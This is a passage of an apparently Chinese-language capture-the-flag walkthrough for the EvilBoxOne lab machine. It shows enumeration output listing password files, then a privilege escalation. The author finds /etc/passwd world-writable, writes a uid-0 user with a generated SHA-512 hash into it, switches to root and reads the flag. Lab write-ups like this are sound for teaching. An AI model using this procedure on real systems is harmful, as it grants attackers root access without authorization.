/usr/lib/systemd/system/systemd-ask-password-wall.service
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man7/credentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password
╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
从linpeash.sh脚本运行结果可以知道/etc/passwd权限有问题
mowree@EvilBoxOne:/tmp$
mowree@EvilBoxOne:/tmp$ ls -alh /etc/passwd
-rw-rw-rw- 1 root root 1,4K ago 16 2021 /etc/passwd
所有人都有可读可写权限。
现在可以创建一个用户,并赋予root权限
┌──(kali㉿kali)-[~]
└─$ mkpasswd -m sha-512
Password:
$6$vKLGW5G4kKFfAFQL$e7Sr6jGf6BnnVqTnN/xapZvM6mXw0opslfTElZyAi5lh/DcuRgv25eRaMzrVOLyulnEkACKAO4oVgMjDh4S6Q1
mowree@EvilBoxOne:/tmp$ vi /etc/passwd
mowree@EvilBoxOne:/tmp$ tail -1 /etc/passwd
kali:$6$vKLGW5G4kKFfAFQL$e7Sr6jGf6BnnVqTnN/xapZvM6mXw0opslfTElZyAi5lh/DcuRgv25eRaMzrVOLyulnEkACKAO4oVgMjDh4S6Q1:0:0:root:/root:/bin/bash
mowree@EvilBoxOne:/tmp$ su - kali
Contraseña:
root@EvilBoxOne:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@EvilBoxOne:~# cd /root
root@EvilBoxOne:~# ls -alh
total 24K
drwx------ 3 root root 4,0K ago 16 2021 .
drwxr-xr-x 18 root root 4,0K ago 16 2021 ..
lrwxrwxrwx 1 root root 9 ago 16 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3,5K ago 16 2021 .bashrc
drwxr-xr-x 3 root root 4,0K ago 16 2021 .local
-rw-r--r-- 1 root root 148 ago 17 2015 .profile
-r-------- 1 root root 31 ago 16 2021 root.txt
root@EvilBoxOne:~# cat root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM
root@EvilBoxOne:~#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
